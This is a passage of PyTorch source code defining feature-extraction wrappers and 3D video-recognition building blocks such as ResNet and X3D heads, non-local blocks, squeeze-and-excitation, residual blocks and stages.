order as they are used. There should be no reuse of the same nn.Module more than once, including
trivial modules like `self.relu = nn.ReLU`.
Only submodules that are directly assigned to the model class (`model.feature1`) or at most
one Sequential container deep (`model.features.1`, with flatten_sequent=True) can be captured.
All Sequential containers that are directly assigned to the original model will have their
modules assigned to this module with the name `model.features.1` being changed to `model.features_1`
Arguments:
model (nn.Module): model from which we will extract the features
out_indices (tuple[int]): model output indices to extract features for
out_map (sequence): list or tuple specifying desired return id for each out index,
otherwise str(index) is used
feature_concat (bool): whether to concatenate intermediate features that are lists or tuples
vs select element [0]
flatten_sequential (bool): whether to flatten sequential modules assigned to model
"""
def __init__(self, model, out_indices=(0, 1, 2, 3, 4), out_map=None, feature_concat=False, flatten_sequential=False):
super(FeatureDictNet, self).__init__()
self.feature_info = _get_feature_info(model, out_indices)
self.concat = feature_concat
self.return_layers = {}
return_layers = _get_return_layers(self.feature_info, out_map)
modules = _module_list(model, flatten_sequential=flatten_sequential)
remaining = set(return_layers.keys())
layers = OrderedDict()
for new_name, old_name, module in modules:
layers[new_name] = module
if old_name in remaining:
self.return_layers[new_name] = str(return_layers[old_name])
remaining.remove(old_name)
if not remaining:
break
assert not remaining and len(self.return_layers) == len(return_layers), f'Return layers ({remaining}) are not present in model'
self.update(layers)
def _collect(self, x) ->Dict[str, torch.Tensor]:
out = OrderedDict()
for name, module in self.items():
x = module(x)
if name in self.return_layers:
out_id = self.return_layers[name]
if isinstance(x, (tuple, list)):
out[out_id] = torch.cat(x, 1) if self.concat else x[0]
else:
out[out_id] = x
return out
def forward(self, x) ->Dict[str, torch.Tensor]:
return self._collect(x)
class FeatureListNet(FeatureDictNet):
""" Feature extractor with list return
See docstring for FeatureDictNet above, this class exists only to appease Torchscript typing constraints.
In eager Python we could have returned List[Tensor] vs Dict[id, Tensor] based on a member bool.
"""
def __init__(self, model, out_indices=(0, 1, 2, 3, 4), out_map=None, feature_concat=False, flatten_sequential=False):
super(FeatureListNet, self).__init__(model, out_indices=out_indices, out_map=out_map, feature_concat=feature_concat, flatten_sequential=flatten_sequential)
def forward(self, x) ->List[torch.Tensor]:
return list(self._collect(x).values())
class FeatureHooks:
""" Feature Hook Helper
This module helps with the setup and extraction of hooks for extracting features from
internal nodes in a model by node name. This works quite well in eager Python but needs
redesign for torcscript.
"""
def __init__(self, hooks, named_modules, out_map=None, default_hook_type='forward'):
modules = {k: v for k, v in named_modules}
for i, h in enumerate(hooks):
hook_name = h['module']
m = modules[hook_name]
hook_id = out_map[i] if out_map else hook_name
hook_fn = partial(self._collect_output_hook, hook_id)
hook_type = h['hook_type'] if 'hook_type' in h else default_hook_type
if hook_type == 'forward_pre':
m.register_forward_pre_hook(hook_fn)
elif hook_type == 'forward':
m.register_forward_hook(hook_fn)
else:
assert False, 'Unsupported hook type'
self._feature_outputs = defaultdict(OrderedDict)
def _collect_output_hook(self, hook_id, *args):
x = args[-1]
if isinstance(x, tuple):
x = x[0]
self._feature_outputs[x.device][hook_id] = x
def get_output(self, device) ->Dict[str, torch.tensor]:
output = self._feature_outputs[device]
self._feature_outputs[device] = OrderedDict()
return output
class FeatureHookNet(nn.ModuleDict):
""" FeatureHookNet
Wrap a model and extract features specified by the out indices using forward/forward-pre hooks.
If `no_rewrite` is True, features are extracted via hooks without modifying the underlying
network in any way.
If `no_rewrite` is False, the model will be re-written as in the
FeatureList/FeatureDict case by folding first to second (Sequential only) level modules into this one.
FIXME this does not currently work with Torchscript, see FeatureHooks class
"""
def __init__(self, model, out_indices=(0, 1, 2, 3, 4), out_map=None, out_as_dict=False, no_rewrite=False, feature_concat=False, flatten_sequential=False, default_hook_type='forward'):
super(FeatureHookNet, self).__init__()
assert not torch.jit.is_scripting()
self.feature_info = _get_feature_info(model, out_indices)
self.out_as_dict = out_as_dict
layers = OrderedDict()
hooks = []
if no_rewrite:
assert not flatten_sequential
if hasattr(model, 'reset_classifier'):
model.reset_classifier(0)
layers['body'] = model
hooks.extend(self.feature_info.get_dicts())
else:
modules = _module_list(model, flatten_sequential=flatten_sequential)
remaining = {f['module']: (f['hook_type'] if 'hook_type' in f else default_hook_type) for f in self.feature_info.get_dicts()}
for new_name, old_name, module in modules:
layers[new_name] = module
for fn, fm in module.named_modules(prefix=old_name):
if fn in remaining:
hooks.append(dict(module=fn, hook_type=remaining[fn]))
del remaining[fn]
if not remaining:
break
assert not remaining, f'Return layers ({remaining}) are not present in model'
self.update(layers)
self.hooks = FeatureHooks(hooks, model.named_modules(), out_map=out_map)
def forward(self, x):
for name, module in self.items():
x = module(x)
out = self.hooks.get_output(x.device)
return out if self.out_as_dict else list(out.values())
class ResNetBasicHead(nn.Module):
"""
ResNe(X)t 3D head.
This layer performs a fully-connected projection during training, when the
input size is 1x1x1. It performs a convolutional projection during testing
when the input size is larger than 1x1x1. If the inputs are from multiple
different pathways, the inputs will be concatenated after pooling.
"""
def __init__(self, dim_in, num_classes, pool_size, dropout_rate=0.0, act_func='softmax'):
"""
The `__init__` method of any subclass should also contain these
arguments.
ResNetBasicHead takes p pathways as input where p in [1, infty].
Args:
dim_in (list): the list of channel dimensions of the p inputs to the
ResNetHead.
num_classes (int): the channel dimensions of the p outputs to the
ResNetHead.
pool_size (list): the list of kernel sizes of p spatial temporal
poolings, temporal pool kernel size, spatial pool kernel size,
spatial pool kernel size in order.
dropout_rate (float): dropout rate. If equal to 0.0, perform no
dropout.
act_func (string): activation function to use. 'softmax': applies
softmax on the output. 'sigmoid': applies sigmoid on the output.
"""
super(ResNetBasicHead, self).__init__()
assert len({len(pool_size), len(dim_in)}) == 1, 'pathway dimensions are not consistent.'
self.num_pathways = len(pool_size)
for pathway in range(self.num_pathways):
if pool_size[pathway] is None:
avg_pool = nn.AdaptiveAvgPool3d((1, 1, 1))
else:
avg_pool = nn.AvgPool3d(pool_size[pathway], stride=1)
self.add_module('pathway{}_avgpool'.format(pathway), avg_pool)
if dropout_rate > 0.0:
self.dropout = nn.Dropout(dropout_rate)
self.projection = nn.Linear(sum(dim_in), num_classes, bias=True)
if act_func == 'softmax':
self.act = nn.Softmax(dim=4)
elif act_func == 'sigmoid':
self.act = nn.Sigmoid()
else:
raise NotImplementedError('{} is not supported as an activationfunction.'.format(act_func))
def forward(self, inputs):
assert len(inputs) == self.num_pathways, 'Input tensor does not contain {} pathway'.format(self.num_pathways)
pool_out = []
for pathway in range(self.num_pathways):
m = getattr(self, 'pathway{}_avgpool'.format(pathway))
pool_out.append(m(inputs[pathway]))
x = torch.cat(pool_out, 1)
x = x.permute((0, 2, 3, 4, 1))
if hasattr(self, 'dropout'):
x = self.dropout(x)
x = self.projection(x)
if not self.training:
x = self.act(x)
x = x.mean([1, 2, 3])
x = x.view(x.shape[0], -1)
return x
class X3DHead(nn.Module):
"""
X3D head.
This layer performs a fully-connected projection during training, when the
input size is 1x1x1. It performs a convolutional projection during testing
when the input size is larger than 1x1x1. If the inputs are from multiple
different pathways, the inputs will be concatenated after pooling.
"""
def __init__(self, dim_in, dim_inner, dim_out, num_classes, pool_size, dropout_rate=0.0, act_func='softmax', inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d, bn_lin5_on=False):
"""
The `__init__` method of any subclass should also contain these
arguments.
X3DHead takes a 5-dim feature tensor (BxCxTxHxW) as input.
Args:
dim_in (float): the channel dimension C of the input.
num_classes (int): the channel dimensions of the output.
pool_size (float): a single entry list of kernel size for
spatiotemporal pooling for the TxHxW dimensions.
dropout_rate (float): dropout rate. If equal to 0.0, perform no
dropout.
act_func (string): activation function to use. 'softmax': applies
softmax on the output. 'sigmoid': applies sigmoid on the output.
inplace_relu (bool): if True, calculate the relu on the original
input without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
bn_lin5_on (bool): if True, perform normalization on the features
before the classifier.
"""
super(X3DHead, self).__init__()
self.pool_size = pool_size
self.dropout_rate = dropout_rate
self.num_classes = num_classes
self.act_func = act_func
self.eps = eps
self.bn_mmt = bn_mmt
self.inplace_relu = inplace_relu
self.bn_lin5_on = bn_lin5_on
self._construct_head(dim_in, dim_inner, dim_out, norm_module)
def _construct_head(self, dim_in, dim_inner, dim_out, norm_module):
self.conv_5 = nn.Conv3d(dim_in, dim_inner, kernel_size=(1, 1, 1), stride=(1, 1, 1), padding=(0, 0, 0), bias=False)
self.conv_5_bn = norm_module(num_features=dim_inner, eps=self.eps, momentum=self.bn_mmt)
self.conv_5_relu = nn.ReLU(self.inplace_relu)
if self.pool_size is None:
self.avg_pool = nn.AdaptiveAvgPool3d((1, 1, 1))
else:
self.avg_pool = nn.AvgPool3d(self.pool_size, stride=1)
self.lin_5 = nn.Conv3d(dim_inner, dim_out, kernel_size=(1, 1, 1), stride=(1, 1, 1), padding=(0, 0, 0), bias=False)
if self.bn_lin5_on:
self.lin_5_bn = norm_module(num_features=dim_out, eps=self.eps, momentum=self.bn_mmt)
self.lin_5_relu = nn.ReLU(self.inplace_relu)
if self.dropout_rate > 0.0:
self.dropout = nn.Dropout(self.dropout_rate)
self.projection = nn.Linear(dim_out, self.num_classes, bias=True)
if self.act_func == 'softmax':
self.act = nn.Softmax(dim=4)
elif self.act_func == 'sigmoid':
self.act = nn.Sigmoid()
else:
raise NotImplementedError('{} is not supported as an activationfunction.'.format(self.act_func))
def forward(self, inputs):
assert len(inputs) == 1, 'Input tensor does not contain 1 pathway'
x = self.conv_5(inputs[0])
x = self.conv_5_bn(x)
x = self.conv_5_relu(x)
x = self.avg_pool(x)
x = self.lin_5(x)
if self.bn_lin5_on:
x = self.lin_5_bn(x)
x = self.lin_5_relu(x)
x = x.permute((0, 2, 3, 4, 1))
if hasattr(self, 'dropout'):
x = self.dropout(x)
x = self.projection(x)
if not self.training:
x = self.act(x)
x = x.mean([1, 2, 3])
x = x.view(x.shape[0], -1)
return x
class Linear(nn.Linear):
def forward(self, input: torch.Tensor) ->torch.Tensor:
if torch.jit.is_scripting():
bias = self.bias if self.bias is not None else None
return F.linear(input, self.weight, bias=bias)
else:
return F.linear(input, self.weight, self.bias)
class Nonlocal(nn.Module):
"""
Builds Non-local Neural Networks as a generic family of building
blocks for capturing long-range dependencies. Non-local Network
computes the response at a position as a weighted sum of the
features at all positions. This building block can be plugged into
many computer vision architectures.
More details in the paper: https://arxiv.org/pdf/1711.07971.pdf
"""
def __init__(self, dim, dim_inner, pool_size=None, instantiation='softmax', zero_init_final_conv=False, zero_init_final_norm=True, norm_eps=1e-05, norm_momentum=0.1, norm_module=nn.BatchNorm3d):
"""
Args:
dim (int): number of dimension for the input.
dim_inner (int): number of dimension inside of the Non-local block.
pool_size (list): the kernel size of spatial temporal pooling,
temporal pool kernel size, spatial pool kernel size, spatial
pool kernel size in order. By default pool_size is None,
then there would be no pooling used.
instantiation (string): supports two different instantiation method:
"dot_product": normalizing correlation matrix with L2.
"softmax": normalizing correlation matrix with Softmax.
zero_init_final_conv (bool): If true, zero initializing the final
convolution of the Non-local block.
zero_init_final_norm (bool):
If true, zero initializing the final batch norm of the Non-local
block.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
"""
super(Nonlocal, self).__init__()
self.dim = dim
self.dim_inner = dim_inner
self.pool_size = pool_size
self.instantiation = instantiation
self.use_pool = False if pool_size is None else any(size > 1 for size in pool_size)
self.norm_eps = norm_eps
self.norm_momentum = norm_momentum
self._construct_nonlocal(zero_init_final_conv, zero_init_final_norm, norm_module)
def _construct_nonlocal(self, zero_init_final_conv, zero_init_final_norm, norm_module):
self.conv_theta = nn.Conv3d(self.dim, self.dim_inner, kernel_size=1, stride=1, padding=0)
self.conv_phi = nn.Conv3d(self.dim, self.dim_inner, kernel_size=1, stride=1, padding=0)
self.conv_g = nn.Conv3d(self.dim, self.dim_inner, kernel_size=1, stride=1, padding=0)
self.conv_out = nn.Conv3d(self.dim_inner, self.dim, kernel_size=1, stride=1, padding=0)
self.conv_out.zero_init = zero_init_final_conv
self.bn = norm_module(num_features=self.dim, eps=self.norm_eps, momentum=self.norm_momentum)
self.bn.transform_final_bn = zero_init_final_norm
if self.use_pool:
self.pool = nn.MaxPool3d(kernel_size=self.pool_size, stride=self.pool_size, padding=[0, 0, 0])
def forward(self, x):
x_identity = x
N, C, T, H, W = x.size()
theta = self.conv_theta(x)
if self.use_pool:
x = self.pool(x)
phi = self.conv_phi(x)
g = self.conv_g(x)
theta = theta.view(N, self.dim_inner, -1)
phi = phi.view(N, self.dim_inner, -1)
g = g.view(N, self.dim_inner, -1)
theta_phi = torch.einsum('nct,ncp->ntp', (theta, phi))
if self.instantiation == 'softmax':
theta_phi = theta_phi * self.dim_inner ** -0.5
theta_phi = nn.functional.softmax(theta_phi, dim=2)
elif self.instantiation == 'dot_product':
spatial_temporal_dim = theta_phi.shape[2]
theta_phi = theta_phi / spatial_temporal_dim
else:
raise NotImplementedError('Unknown norm type {}'.format(self.instantiation))
theta_phi_g = torch.einsum('ntg,ncg->nct', (theta_phi, g))
theta_phi_g = theta_phi_g.view(N, self.dim_inner, T, H, W)
p = self.conv_out(theta_phi_g)
p = self.bn(p)
return x_identity + p
class SwishEfficient(torch.autograd.Function):
"""Swish activation function: x * sigmoid(x)."""
@staticmethod
def forward(ctx, x):
result = x * torch.sigmoid(x)
ctx.save_for_backward(x)
return result
@staticmethod
def backward(ctx, grad_output):
x = ctx.saved_variables[0]
sigmoid_x = torch.sigmoid(x)
return grad_output * (sigmoid_x * (1 + x * (1 - sigmoid_x)))
class Swish(nn.Module):
"""Swish activation function: x * sigmoid(x)."""
def __init__(self):
super(Swish, self).__init__()
def forward(self, x):
return SwishEfficient.apply(x)
class SE(nn.Module):
"""Squeeze-and-Excitation (SE) block w/ Swish: AvgPool, FC, Swish, FC, Sigmoid."""
def _round_width(self, width, multiplier, min_width=8, divisor=8):
"""
Round width of filters based on width multiplier
Args:
width (int): the channel dimensions of the input.
multiplier (float): the multiplication factor.
min_width (int): the minimum width after multiplication.
divisor (int): the new width should be dividable by divisor.
"""
if not multiplier:
return width
width *= multiplier
min_width = min_width or divisor
width_out = max(min_width, int(width + divisor / 2) // divisor * divisor)
if width_out < 0.9 * width:
width_out += divisor
return int(width_out)
def __init__(self, dim_in, ratio, relu_act=True):
"""
Args:
dim_in (int): the channel dimensions of the input.
ratio (float): the channel reduction ratio for squeeze.
relu_act (bool): whether to use ReLU activation instead
of Swish (default).
divisor (int): the new width should be dividable by divisor.
"""
super(SE, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool3d((1, 1, 1))
dim_fc = self._round_width(dim_in, ratio)
self.fc1 = nn.Conv3d(dim_in, dim_fc, 1, bias=True)
self.fc1_act = nn.ReLU() if relu_act else Swish()
self.fc2 = nn.Conv3d(dim_fc, dim_in, 1, bias=True)
self.fc2_sig = nn.Sigmoid()
def forward(self, x):
x_in = x
for module in self.children():
x = module(x)
return x_in * x
class BasicTransform(nn.Module):
"""
Basic transformation: Tx3x3, 1x3x3, where T is the size of temporal kernel.
"""
def __init__(self, dim_in, dim_out, temp_kernel_size, stride, dim_inner=None, num_groups=1, stride_1x1=None, inplace_relu=True, eps=1e-05, bn_mmt=0.1, norm_module=nn.BatchNorm3d, block_idx=0):
"""
Args:
dim_in (int): the channel dimensions of the input.
dim_out (int): the channel dimension of the output.
temp_kernel_size (int): the temporal kernel sizes of the first
convolution in the basic block.
stride (int): the stride of the bottleneck.
dim_inner (None): the inner dimension would not be used in
BasicTransform.
num_groups (int): number of groups for the convolution. Number of
group is always 1 for BasicTransform.
stride_1x1 (None): stride_1x1 will not be used in BasicTransform.
inplace_relu (bool): if True, calculate the relu on the original
input without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
"""
super(BasicTransform, self).__init__()
self.temp_kernel_size = temp_kernel_size
self._inplace_relu = inplace_relu
self._eps = eps
self._bn_mmt = bn_mmt
self._construct(dim_in, dim_out, stride, norm_module)
def _construct(self, dim_in, dim_out, stride, norm_module):
self.a = nn.Conv3d(dim_in, dim_out, kernel_size=[self.temp_kernel_size, 3, 3], stride=[1, stride, stride], padding=[int(self.temp_kernel_size // 2), 1, 1], bias=False)
self.a_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
self.a_relu = nn.ReLU(inplace=self._inplace_relu)
self.b = nn.Conv3d(dim_out, dim_out, kernel_size=[1, 3, 3], stride=[1, 1, 1], padding=[0, 1, 1], bias=False)
self.b_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
self.b_bn.transform_final_bn = True
def forward(self, x):
x = self.a(x)
x = self.a_bn(x)
x = self.a_relu(x)
x = self.b(x)
x = self.b_bn(x)
return x
class X3DTransform(nn.Module):
"""
X3D transformation: 1x1x1, Tx3x3 (channelwise, num_groups=dim_in), 1x1x1,
augmented with (optional) SE (squeeze-excitation) on the 3x3x3 output.
T is the temporal kernel size (defaulting to 3)
"""
def __init__(self, dim_in, dim_out, temp_kernel_size, stride, dim_inner, num_groups, stride_1x1=False, inplace_relu=True, eps=1e-05, bn_mmt=0.1, dilation=1, norm_module=nn.BatchNorm3d, se_ratio=0.0625, swish_inner=True, block_idx=0):
"""
Args:
dim_in (int): the channel dimensions of the input.
dim_out (int): the channel dimension of the output.
temp_kernel_size (int): the temporal kernel sizes of the middle
convolution in the bottleneck.
stride (int): the stride of the bottleneck.
dim_inner (int): the inner dimension of the block.
num_groups (int): number of groups for the convolution. num_groups=1
is for standard ResNet like networks, and num_groups>1 is for
ResNeXt like networks.
stride_1x1 (bool): if True, apply stride to 1x1 conv, otherwise
apply stride to the 3x3 conv.
inplace_relu (bool): if True, calculate the relu on the original
input without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
dilation (int): size of dilation.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
se_ratio (float): if > 0, apply SE to the Tx3x3 conv, with the SE
channel dimensionality being se_ratio times the Tx3x3 conv dim.
swish_inner (bool): if True, apply swish to the Tx3x3 conv, otherwise
apply ReLU to the Tx3x3 conv.
"""
super(X3DTransform, self).__init__()
self.temp_kernel_size = temp_kernel_size
self._inplace_relu = inplace_relu
self._eps = eps
self._bn_mmt = bn_mmt
self._se_ratio = se_ratio
self._swish_inner = swish_inner
self._stride_1x1 = stride_1x1
self._block_idx = block_idx
self._construct(dim_in, dim_out, stride, dim_inner, num_groups, dilation, norm_module)
def _construct(self, dim_in, dim_out, stride, dim_inner, num_groups, dilation, norm_module):
str1x1, str3x3 = (stride, 1) if self._stride_1x1 else (1, stride)
self.a = nn.Conv3d(dim_in, dim_inner, kernel_size=[1, 1, 1], stride=[1, str1x1, str1x1], padding=[0, 0, 0], bias=False)
self.a_bn = norm_module(num_features=dim_inner, eps=self._eps, momentum=self._bn_mmt)
self.a_relu = nn.ReLU(inplace=self._inplace_relu)
self.b = nn.Conv3d(dim_inner, dim_inner, [self.temp_kernel_size, 3, 3], stride=[1, str3x3, str3x3], padding=[int(self.temp_kernel_size // 2), dilation, dilation], groups=num_groups, bias=False, dilation=[1, dilation, dilation])
self.b_bn = norm_module(num_features=dim_inner, eps=self._eps, momentum=self._bn_mmt)
use_se = True if (self._block_idx + 1) % 2 else False
if self._se_ratio > 0.0 and use_se:
self.se = SE(dim_inner, self._se_ratio)
if self._swish_inner:
self.b_relu = Swish()
else:
self.b_relu = nn.ReLU(inplace=self._inplace_relu)
self.c = nn.Conv3d(dim_inner, dim_out, kernel_size=[1, 1, 1], stride=[1, 1, 1], padding=[0, 0, 0], bias=False)
self.c_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
self.c_bn.transform_final_bn = True
def forward(self, x):
for block in self.children():
x = block(x)
return x
class BottleneckTransform(nn.Module):
"""
Bottleneck transformation: Tx1x1, 1x3x3, 1x1x1, where T is the size of
temporal kernel.
"""
def __init__(self, dim_in, dim_out, temp_kernel_size, stride, dim_inner, num_groups, stride_1x1=False, inplace_relu=True, eps=1e-05, bn_mmt=0.1, dilation=1, norm_module=nn.BatchNorm3d, block_idx=0):
"""
Args:
dim_in (int): the channel dimensions of the input.
dim_out (int): the channel dimension of the output.
temp_kernel_size (int): the temporal kernel sizes of the first
convolution in the bottleneck.
stride (int): the stride of the bottleneck.
dim_inner (int): the inner dimension of the block.
num_groups (int): number of groups for the convolution. num_groups=1
is for standard ResNet like networks, and num_groups>1 is for
ResNeXt like networks.
stride_1x1 (bool): if True, apply stride to 1x1 conv, otherwise
apply stride to the 3x3 conv.
inplace_relu (bool): if True, calculate the relu on the original
input without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
dilation (int): size of dilation.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
"""
super(BottleneckTransform, self).__init__()
self.temp_kernel_size = temp_kernel_size
self._inplace_relu = inplace_relu
self._eps = eps
self._bn_mmt = bn_mmt
self._stride_1x1 = stride_1x1
self._construct(dim_in, dim_out, stride, dim_inner, num_groups, dilation, norm_module)
def _construct(self, dim_in, dim_out, stride, dim_inner, num_groups, dilation, norm_module):
str1x1, str3x3 = (stride, 1) if self._stride_1x1 else (1, stride)
self.a = nn.Conv3d(dim_in, dim_inner, kernel_size=[self.temp_kernel_size, 1, 1], stride=[1, str1x1, str1x1], padding=[int(self.temp_kernel_size // 2), 0, 0], bias=False)
self.a_bn = norm_module(num_features=dim_inner, eps=self._eps, momentum=self._bn_mmt)
self.a_relu = nn.ReLU(inplace=self._inplace_relu)
self.b = nn.Conv3d(dim_inner, dim_inner, [1, 3, 3], stride=[1, str3x3, str3x3], padding=[0, dilation, dilation], groups=num_groups, bias=False, dilation=[1, dilation, dilation])
self.b_bn = norm_module(num_features=dim_inner, eps=self._eps, momentum=self._bn_mmt)
self.b_relu = nn.ReLU(inplace=self._inplace_relu)
self.c = nn.Conv3d(dim_inner, dim_out, kernel_size=[1, 1, 1], stride=[1, 1, 1], padding=[0, 0, 0], bias=False)
self.c_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
self.c_bn.transform_final_bn = True
def forward(self, x):
x = self.a(x)
x = self.a_bn(x)
x = self.a_relu(x)
x = self.b(x)
x = self.b_bn(x)
x = self.b_relu(x)
x = self.c(x)
x = self.c_bn(x)
return x
class ResBlock(nn.Module):
"""
Residual block.
"""
def __init__(self, dim_in, dim_out, temp_kernel_size, stride, trans_func, dim_inner, num_groups=1, stride_1x1=False, inplace_relu=True, eps=1e-05, bn_mmt=0.1, dilation=1, norm_module=nn.BatchNorm3d, block_idx=0, drop_connect_rate=0.0):
"""
ResBlock class constructs redisual blocks. More details can be found in:
Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian Sun.
"Deep residual learning for image recognition."
https://arxiv.org/abs/1512.03385
Args:
dim_in (int): the channel dimensions of the input.
dim_out (int): the channel dimension of the output.
temp_kernel_size (int): the temporal kernel sizes of the middle
convolution in the bottleneck.
stride (int): the stride of the bottleneck.
trans_func (string): transform function to be used to construct the
bottleneck.
dim_inner (int): the inner dimension of the block.
num_groups (int): number of groups for the convolution. num_groups=1
is for standard ResNet like networks, and num_groups>1 is for
ResNeXt like networks.
stride_1x1 (bool): if True, apply stride to 1x1 conv, otherwise
apply stride to the 3x3 conv.
inplace_relu (bool): calculate the relu on the original input
without allocating new memory.
eps (float): epsilon for batch norm.
bn_mmt (float): momentum for batch norm. Noted that BN momentum in
PyTorch = 1 - BN momentum in Caffe2.
dilation (int): size of dilation.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
drop_connect_rate (float): basic rate at which blocks are dropped,
linearly increases from input to output blocks.
"""
super(ResBlock, self).__init__()
self._inplace_relu = inplace_relu
self._eps = eps
self._bn_mmt = bn_mmt
self._drop_connect_rate = drop_connect_rate
self._construct(dim_in, dim_out, temp_kernel_size, stride, trans_func, dim_inner, num_groups, stride_1x1, inplace_relu, dilation, norm_module, block_idx)
def _construct(self, dim_in, dim_out, temp_kernel_size, stride, trans_func, dim_inner, num_groups, stride_1x1, inplace_relu, dilation, norm_module, block_idx):
if dim_in != dim_out or stride != 1:
self.branch1 = nn.Conv3d(dim_in, dim_out, kernel_size=1, stride=[1, stride, stride], padding=0, bias=False, dilation=1)
self.branch1_bn = norm_module(num_features=dim_out, eps=self._eps, momentum=self._bn_mmt)
self.branch2 = trans_func(dim_in, dim_out, temp_kernel_size, stride, dim_inner, num_groups, stride_1x1=stride_1x1, inplace_relu=inplace_relu, dilation=dilation, norm_module=norm_module, block_idx=block_idx)
self.relu = nn.ReLU(self._inplace_relu)
def _drop_connect(self, x, drop_ratio):
"""Apply dropconnect to x"""
keep_ratio = 1.0 - drop_ratio
mask = torch.empty([x.shape[0], 1, 1, 1, 1], dtype=x.dtype, device=x.device)
mask.bernoulli_(keep_ratio)
x.div_(keep_ratio)
x.mul_(mask)
return x
def forward(self, x):
f_x = self.branch2(x)
if self.training and self._drop_connect_rate > 0.0:
f_x = self._drop_connect(f_x, self._drop_connect_rate)
if hasattr(self, 'branch1'):
x = self.branch1_bn(self.branch1(x)) + f_x
else:
x = x + f_x
x = self.relu(x)
return x
def get_trans_func(name):
"""
Retrieves the transformation module by name.
"""
trans_funcs = {'bottleneck_transform': BottleneckTransform, 'basic_transform': BasicTransform, 'x3d_transform': X3DTransform}
assert name in trans_funcs.keys(), "Transformation function '{}' not supported".format(name)
return trans_funcs[name]
class ResStage(nn.Module):
"""
Stage of 3D ResNet. It expects to have one or more tensors as input for
single pathway (C2D, I3D, Slow), and multi-pathway (SlowFast) cases.
More details can be found here:
Christoph Feichtenhofer, Haoqi Fan, Jitendra Malik, and Kaiming He.
"SlowFast networks for video recognition."
https://arxiv.org/pdf/1812.03982.pdf
"""
def __init__(self, dim_in, dim_out, stride, temp_kernel_sizes, num_blocks, dim_inner, num_groups, num_block_temp_kernel, nonlocal_inds, nonlocal_group, nonlocal_pool, dilation, instantiation='softmax', trans_func_name='bottleneck_transform', stride_1x1=False, inplace_relu=True, norm_module=nn.BatchNorm3d, drop_connect_rate=0.0):
"""
The `__init__` method of any subclass should also contain these arguments.
ResStage builds p streams, where p can be greater or equal to one.
Args:
dim_in (list): list of p the channel dimensions of the input.
Different channel dimensions control the input dimension of
different pathways.
dim_out (list): list of p the channel dimensions of the output.
Different channel dimensions control the input dimension of
different pathways.
temp_kernel_sizes (list): list of the p temporal kernel sizes of the
convolution in the bottleneck. Different temp_kernel_sizes
control different pathway.
stride (list): list of the p strides of the bottleneck. Different
stride control different pathway.
num_blocks (list): list of p numbers of blocks for each of the
pathway.
dim_inner (list): list of the p inner channel dimensions of the
input. Different channel dimensions control the input dimension
of different pathways.
num_groups (list): list of number of p groups for the convolution.
num_groups=1 is for standard ResNet like networks, and
num_groups>1 is for ResNeXt like networks.
num_block_temp_kernel (list): extent the temp_kernel_sizes to
num_block_temp_kernel blocks, then fill temporal kernel size
of 1 for the rest of the layers.
nonlocal_inds (list): If the tuple is empty, no nonlocal layer will
be added. If the tuple is not empty, add nonlocal layers after
the index-th block.
dilation (list): size of dilation for each pathway.
nonlocal_group (list): list of number of p nonlocal groups. Each
number controls how to fold temporal dimension to batch
dimension before applying nonlocal transformation.
https://github.com/facebookresearch/video-nonlocal-net.
instantiation (string): different instantiation for nonlocal layer.
Supports two different instantiation method:
"dot_product": normalizing correlation matrix with L2.
"softmax": normalizing correlation matrix with Softmax.
trans_func_name (string): name of the the transformation function apply
on the network.
norm_module (nn.Module): nn.Module for the normalization layer. The
default is nn.BatchNorm3d.
drop_connect_rate (float): basic rate at which blocks are dropped,
linearly increases from input to output blocks.
"""
super(ResStage, self).__init__()
assert all(num_block_temp_kernel[i] <= num_blocks[i] for i in range(len(temp_kernel_sizes)))
self.num_blocks = num_blocks
self.nonlocal_group = nonlocal_group
self._drop_connect_rate = drop_connect_rate
self.temp_kernel_sizes = [((temp_kernel_sizes[i] * num_blocks[i])[:num_block_temp_kernel[i]] + [1] * (num_blocks[i] - num_block_temp_kernel[i])) for i in range(len(temp_kernel_sizes))]
assert len({len(dim_in), len(dim_out), len(temp_kernel_sizes), len(stride), len(num_blocks), len(dim_inner), len(num_groups), len(num_block_temp_kernel), len(nonlocal_inds), len(nonlocal_group)}) == 1
self.num_pathways = len(self.num_blocks)
self._construct(dim_in, dim_out, stride, dim_inner, num_groups, trans_func_name, stride_1x1, inplace_relu, nonlocal_inds, nonlocal_pool, instantiation, dilation, norm_module)
def _construct(self, dim_in, dim_out, stride, dim_inner, num_groups, trans_func_name, stride_1x1, inplace_relu, nonlocal_inds, nonlocal_pool, instantiation, dilation, norm_module):
for pathway in range(self.num_pathways):
for i in range(self.num_blocks[pathway]):
trans_func = get_trans_func(trans_func_name)
res_block = ResBlock(dim_in[pathway] if i == 0 else dim_out[pathway], dim_out[pathway], self.temp_kernel_sizes[pathway][i], stride[pathway] if i == 0 else 1, trans_func, dim_inner[pathway], num_groups[pathway], stride_1x1=stride_1x1, inplace_relu=inplace_relu, dilation=dilation[pathway], norm_module=norm_module, block_idx=i, drop_connect_rate=self._drop_connect_rate)
self.add_module('pathway{}_res{}'.format(pathway, i), res_block)
if i in nonlocal_inds[pathway]:
nln = Nonlocal(dim_out[pathway], dim_out[pathway] // 2, nonlocal_pool[pathway], instantiation=instantiation, norm_module=norm_module)
